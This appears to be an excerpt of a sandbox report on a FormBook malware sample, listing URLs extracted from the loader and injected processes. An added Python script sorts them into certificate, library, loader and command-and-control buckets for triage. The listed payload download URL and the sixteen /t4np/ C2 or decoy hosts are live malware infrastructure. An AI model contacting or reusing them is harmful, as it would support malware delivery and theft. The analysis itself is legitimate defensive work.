Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://instagram.com/casarpontocom
Source: Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://james.newtonking.com/projects/json
Source: SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.00000000029FD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.00000000029FD000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.0000000002832000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0O
Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: SC_0017384.exe, 00000000.00000002.382705892.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.0000000002591000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.00000000026DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.33347.net
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.33347.net/t4np/
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.33347.netwww.33347.net
Source: explorer.exe, 00000004.00000003.533668803.000000000ED27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.575675145.0000000000921000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.592015514.000000000ED28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.386129776.000000000091F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.babupaul.com
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.babupaul.com/t4np/
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.babupaul.comwww.babupaul.com
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.brunaeleandro.com
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.brunaeleandro.com/t4np/
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.brunaeleandro.comwww.brunaeleandro.com
Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.emprendizajesocial.com
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.emprendizajesocial.com/t4np/
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.emprendizajesocial.comwww.emprendizajesocial.com
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.evelycosmetique.com
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.evelycosmetique.com/t4np/
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.evelycosmetique.comwww.evelycosmetique.com
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.findmyoriginstory.com
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.findmyoriginstory.com/t4np/
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.findmyoriginstory.comwww.findmyoriginstory.com
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.funhood.life
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.funhood.life/t4np/
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.funhood.lifewww.funhood.life
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.groupekoriolis.com
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.groupekoriolis.com/t4np/
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.groupekoriolis.comwww.groupekoriolis.com
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.icste-conference.org
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.icste-conference.org/t4np/
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.icste-conference.orgwww.icste-conference.org
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.madisoncountylincoln.com
Source: explorer.exe, 00000004.00000002.594853816.00000000160EE000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005E0E000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.madisoncountylincoln.com/
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.madisoncountylincoln.com/t4np/
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.madisoncountylincoln.comwww.madisoncountylincoln.com
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.mejawajib.shop
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.mejawajib.shop/t4np/
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.mejawajib.shopwww.mejawajib.shop
Source: explorer.exe, 00000004.00000002.584502379.0000000006162000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.metatv.app
Source: explorer.exe, 00000004.00000002.584502379.0000000006162000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.metatv.app/t4np/
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.metatv.appwww.metatv.app
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.mnsmanagmentsolutions.com
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.mnsmanagmentsolutions.com/t4np/
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.mnsmanagmentsolutions.comwww.mnsmanagmentsolutions.com
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.myprojoints.com
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.myprojoints.com/t4np/
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.myprojoints.comwww.myprojoints.com
Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.pinterest.com/casarpontocom
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.rw-bau.com
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.rw-bau.com/t4np/
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.rw-bau.comwww.rw-bau.com
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.sistemadanetflix.site
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.sistemadanetflix.site/t4np/
Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.sistemadanetflix.sitewww.sistemadanetflix.site
Source: SC_0017384.exe, 00000000.00000002.382705892.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.0000000002591000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.00000000026D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://a.uguu.se/fwvfviJb.dat
Source: SC_0017384.exe, Lvdnyvcvr.exe.0.dr String found in binary or memory: https://a.uguu.se/fwvfviJb.dat=
Source: SC_0017384.exe, 00000000.00000002.382705892.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.0000000002591000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.00000000026DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://a.uguu.se4Dp
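The string entries above mix four kinds of URL that a triage should keep apart: CRL, OCSP and CA-certificate URLs (digicert.com, globalsign.net) that come from the Authenticode signature blocks inside the signed .NET loader, .NET library identifiers (james.newtonking.com, schemas.xmlsoap.org), the loader's payload download URL on a.uguu.se, and sixteen hosts that appear only in explorer.exe memory and share the path /t4np/, which is the injected FormBook configuration. FormBook configurations list decoy domains alongside the real C2 server, so every host in that group is an indicator but none is proven C2 by the list alone; the HTTP response at the top of this section, which sets a session cookie for .brunaeleandro.com, shows at least that host in live contact. The script below is an added example and is not part of the Joe Sandbox report: it parses lines in the report's own "Source: ... String found in binary or memory: <url>" format, undoes the two extraction artefacts visible above (the ASN.1 length byte glued onto certificate URLs, as in ocsp.digicert.com0C, and the doubled host, as in www.rw-bau.comwww.rw-bau.com), and groups the result into buckets. The process names, the shared-path heuristic for the C2 list and the CA host patterns are assumptions taken from this report; the sample input is copied from the entries above with the memory-dump identifiers shortened to one per line.

```python
"""Triage of the 'String found in binary or memory' entries in this report.
Added example (not part of the Joe Sandbox report). Process names and the
shared-path heuristic are assumptions taken from this sample's report."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

ENTRY_RE = re.compile(
    r"^Source:\s*(?P<source>.+?)\s+String found in binary or memory:\s*(?P<url>https?://\S+)$"
)
# CRL / OCSP / CA-certificate hosts: they come from the Authenticode signature
# blocks inside the signed .NET loader, not from the malware configuration.
CA_URL_RE = re.compile(r"^https?://[\w.-]*?(digicert\.com|globalsign\.net)")
# The string extractor glues the next ASN.1 length byte onto certificate URLs
# ('...RootG4.crl0', 'ocsp.digicert.com0C', '...CA2.crl0=').
ASN1_TAIL_RE = re.compile(r"0[A-Z=]?$")
# Hosts embedded by .NET libraries as identifiers (Newtonsoft.Json, WCF claim types).
LIBRARY_HOSTS = ("james.newtonking.com", "schemas.xmlsoap.org")
LOADER_PROCESSES = ("SC_0017384.exe", "Lvdnyvcvr.exe")  # initial sample and its dropped copy
INJECTED_PROCESS = "explorer.exe"                      # holds the unpacked FormBook config

# Constructed input: lines copied from the report, dump identifiers shortened to one per line.
REPORT_LINES = [
    "Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E",
    "Source: SC_0017384.exe, 00000000.00000002.381865907.0000000001425000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0",
    "Source: Lvdnyvcvr.exe, 00000009.00000002.570544457.00000000029FD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0",
    "Source: Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://james.newtonking.com/projects/json",
    "Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.33347.net",
    "Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.33347.net/t4np/",
    "Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.33347.netwww.33347.net",
    "Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.brunaeleandro.com/t4np/",
    "Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.brunaeleandro.comwww.brunaeleandro.com",
    "Source: explorer.exe, 00000004.00000002.575675145.0000000000921000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J",
    "Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.casar.com",
    "Source: SC_0017384.exe, 00000000.00000002.382705892.00000000030C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://a.uguu.se/fwvfviJb.dat",
    "Source: SC_0017384.exe, Lvdnyvcvr.exe.0.dr String found in binary or memory: https://a.uguu.se/fwvfviJb.dat=",
    "Source: SC_0017384.exe, 00000000.00000002.385968571.000000000419A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://urn.to/r/sds_see5bad",
    "Source: M61Ae5o9b.8.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=",
    'Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: <a href="https://www.facebook.com/casarpontocom" target="_blank"> equals www.facebook.com (Facebook)',
]


def parse_entry(line):
    """Return (process, url) for a URL string entry, or None for anything else
    (HTML fragments and non-URL strings are skipped on purpose)."""
    m = ENTRY_RE.match(line.strip())
    if not m:
        return None
    return m.group("source").split(",", 1)[0].strip(), m.group("url")


def normalise(url):
    """Return (host, path, clean_url), collapsing the doubled host that adjacent
    config strings produce ('www.rw-bau.comwww.rw-bau.com' -> 'www.rw-bau.com')."""
    parts = urlsplit(url)
    host = parts.netloc.lower()
    half = len(host) // 2
    if half and host[:half] == host[half:]:
        host = host[:half]
    clean = f"{parts.scheme}://{host}{parts.path}"
    if parts.query:
        clean += "?" + parts.query
    return host, parts.path, clean


def triage(lines):
    """Group report entries into IOC buckets; returns a dict of sorted lists."""
    buckets = defaultdict(set)
    injected = defaultdict(dict)  # path -> {host: clean url} seen in explorer.exe
    for process, url in filter(None, map(parse_entry, lines)):
        if CA_URL_RE.match(url):
            buckets["ca_infrastructure"].add(ASN1_TAIL_RE.sub("", url))
            continue
        host, path, clean = normalise(url)
        if host.endswith(LIBRARY_HOSTS):
            buckets["library_strings"].add(clean)
        elif process in LOADER_PROCESSES:
            buckets["loader_urls"].add(clean.rstrip("="))  # 'fwvfviJb.dat=' artefact
        elif process == INJECTED_PROCESS:
            injected[path][host] = clean
        else:
            buckets["other"].add(clean)
    # FormBook's config is a list of hosts sharing one URI path (here /t4np/), most of
    # them decoys: the path shared by the most distinct hosts marks that list, and every
    # host on it is an indicator, none is proven C2 by the list alone.
    c2_path = max((p for p in injected if p), key=lambda p: len(injected[p]), default=None)
    c2_hosts = sorted(injected[c2_path]) if c2_path and len(injected[c2_path]) > 1 else []
    for hosts in injected.values():
        for host, clean in hosts.items():
            if host not in c2_hosts:
                buckets["other"].add(clean)
    result = {"c2_path": c2_path if c2_hosts else None, "c2_candidates": c2_hosts}
    for name in ("loader_urls", "ca_infrastructure", "library_strings", "other"):
        result[name] = sorted(buckets[name])
    return result


if __name__ == "__main__":
    for name, values in triage(REPORT_LINES).items():
        print(name, values)
```

Run over the full entry list of the report the c2_candidates bucket yields the sixteen /t4np/ hosts; the loader bucket keeps only a.uguu.se and urn.to, and the certificate URLs never reach a blocklist. The ASN.1 tail is stripped only for URLs that already matched a CA host, so a malicious domain that happens to end in a digit is not mangled.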
Source: M61Ae5o9b.8.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ajuda.casar.com
Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://br.enterprise.wibson.io/banner.js?siteId=78509e00-767d-4326-9529-f0d523c8137c
Source: M61Ae5o9b.8.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/es5-shim/4.5.14/es5-shim.min.js
Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://connect.facebook.net/en_US/fbevents.js
Source: M61Ae5o9b.8.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: M61Ae5o9b.8.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: M61Ae5o9b.8.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://embed.typeform.com/embed.js
Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js
Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.js
Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://plus.google.com/
Source: M61Ae5o9b.8.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: M61Ae5o9b.8.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: M61Ae5o9b.8.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: M61Ae5o9b.8.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: SC_0017384.exe, 00000000.00000002.385968571.000000000419A000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.401744017.0000000006980000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://urn.to/r/sds_see5bad
Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.casar.com
Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.casar.com/assunto/casamentos/casamentos-reais/
Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.casar.com/assunto/casamentos/decoracao-de-casamento/
Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.casar.com/assunto/cha-de-panela/
Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.casar.com/assunto/lua-de-mel-2/
Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.casar.com/assunto/noivas/dicas-para-noivas/
Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.casar.com/assunto/noivas/vestidos-de-noiva/
